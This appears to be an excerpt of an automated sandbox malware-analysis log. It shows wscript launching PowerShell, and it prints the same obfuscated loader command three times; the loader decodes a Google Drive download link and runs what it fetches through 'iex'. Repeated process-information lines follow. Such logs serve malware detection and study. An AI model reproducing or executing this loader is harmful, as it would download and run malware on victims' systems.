              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esu
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB06600BD pushad ; iretd 4_2_00007FFCB06600C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB0665205 push eax; ret 4_2_00007FFCB0665251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB07379FE push ds; ret 4_2_00007FFCB07379FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07C1CF5C push eax; iretd 14_2_07C1CF5D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
